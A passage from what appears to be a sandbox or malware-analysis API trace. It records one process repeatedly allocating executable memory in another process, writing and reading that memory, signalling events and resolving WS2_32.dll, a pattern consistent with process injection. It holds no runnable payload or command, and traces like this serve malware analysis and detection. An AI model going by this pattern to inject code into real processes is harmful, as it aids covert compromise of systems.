(ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.399] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.399] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.399] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a220, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.399] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.399] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c976*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c976*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.399] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.399] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.399] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.400] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.400] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.400] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.400] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.400] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.400] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.400] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.400] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.400] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.401] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a228, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.401] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.401] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c98a*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c98a*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.401] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.401] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.401] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.401] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.402] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.402] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.402] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.402] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.402] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.402] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.402] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.402] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.402] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a230, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.402] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.403] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c9a0*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c9a0*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.403] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.403] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.403] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.403] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.403] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.403] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.403] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.404] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.404] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.404] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.404] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.404] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.404] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a238, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.404] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.405] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c91e*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c91e*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.405] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.405] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.405] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.405] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.405] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.405] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.405] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.406] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.406] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.406] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.406] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.406] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.406] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a240, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.406] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.406] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c9b6*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c9b6*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0241.406] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.407] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.407] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.407] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.407] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.407] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.407] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.407] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.408] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.408] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.408] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.408] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.408] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a248, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.408] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.408] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c9f2*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c9f2*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0241.408] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.408] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.409] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.409] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.409] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.409] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.409] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.409] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.409] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.409] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.410] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.410] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.410] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a250, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.410] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52ca2c, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="WS2_32.dll") returned 11 [0241.410] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.410] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0241.410] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.410] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.410] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.411] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.411] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.411] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.411] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.413] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.413] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.413] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.413] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.413] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.413] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.413] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.414] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.414] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.414] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.414] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.414] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.414] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.414] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.415] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.415] NtReadVirtualMemory (in: 